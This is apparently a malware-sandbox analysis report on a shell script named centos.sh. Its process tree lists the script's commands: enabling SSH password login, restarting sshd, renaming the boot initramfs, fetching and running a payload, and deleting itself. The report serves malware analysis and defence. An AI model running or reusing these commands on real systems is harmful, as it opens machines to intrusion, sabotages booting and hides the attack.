0fd0e98bb0bab1cde7d4ea270e12894427a204fe8d27ba1fc5dda056de18051f

Analysis

max time kernel
0s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
21-05-2024 05:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

centos.sh
Size

2KB
MD5

b6f4817bd1ec56cba784c490b4b4c403
SHA1

6e780d3439cc49d9f12278ac7181486df7d5f696
SHA256

0fd0e98bb0bab1cde7d4ea270e12894427a204fe8d27ba1fc5dda056de18051f
SHA512

02bab3b3574848840a00b6fbb910b6b2f533d092f3127f8793f9817c76d4b46c474b45cdecc6a6c14ee764e871cdf964d0f5f49da9f7ca6012a7ec0bc32e88e1

Score

3^/10

Malware Config

Signatures

Reads runtime system information 20 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/filesystems	systemctl

/tmp/centos.sh
/tmp/centos.sh
1⤵
PID:1515
- /bin/sed
  sed -i "s/PasswordAuthentication no/PasswordAuthentication yes/g" /etc/ssh/sshd_config
  2⤵
  - Reads runtime system information
  PID:1516
- /usr/sbin/service
  service sshd restart
  2⤵
  PID:1517
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1518
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1519
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Reads runtime system information
    PID:1520
- /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" restart sshd.service
  2⤵
  PID:1517
- /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" restart sshd.service
  2⤵
  PID:1517
- /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" restart sshd.service
  2⤵
  PID:1517
- /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" restart sshd.service
  2⤵
  PID:1517
- /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" restart sshd.service
  2⤵
  PID:1517
- /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" restart sshd.service
  2⤵
  - Reads runtime system information
  PID:1517
- /bin/grep
  grep kernelopts
  2⤵
  PID:1529
- /bin/uname
  uname -r
  2⤵
  PID:1532
- /bin/uname
  uname -r
  2⤵
  PID:1533
- /bin/mv
  mv /boot/initramfs-4.15.0-213-generic.img /boot/initramfs-4.15.0-213-generic.img.bak
  2⤵
  - Reads runtime system information
  PID:1534
- /bin/uname
  uname -r
  2⤵
  PID:1535
- /bin/uname
  uname -r
  2⤵
  PID:1536
- /bin/systemctl
  systemctl isolate multi-user.target
  2⤵
  - Reads runtime system information
  PID:1538
- /usr/bin/wget
  wget
  2⤵
  PID:1542
- /bin/chmod
  chmod 755
  2⤵
  PID:1543
- /tmp
  ./ -s
  2⤵
  PID:1544
- /bin/rm
  rm -fr centos.sh
  2⤵
  PID:1545

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/ssh/sedalV93L

Filesize
3KB

MD5
739d6887c8f3dd71a9168c614c07175c

SHA1
7618e9cd1fbf134b2dd529eb78ac604bd8148f50

SHA256
c39ec4c3b2a03e0e2494faf628b720b2ded132884411c621b423bd3910930504

SHA512
3b90337cc91bbc6928b34bc1c810ae3008292b277e59f1bf4e3204d816cb9f6bc22028d2656d6effde2fef5613a50f02327b62139fd3f927b623eb82e16f9bb7

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads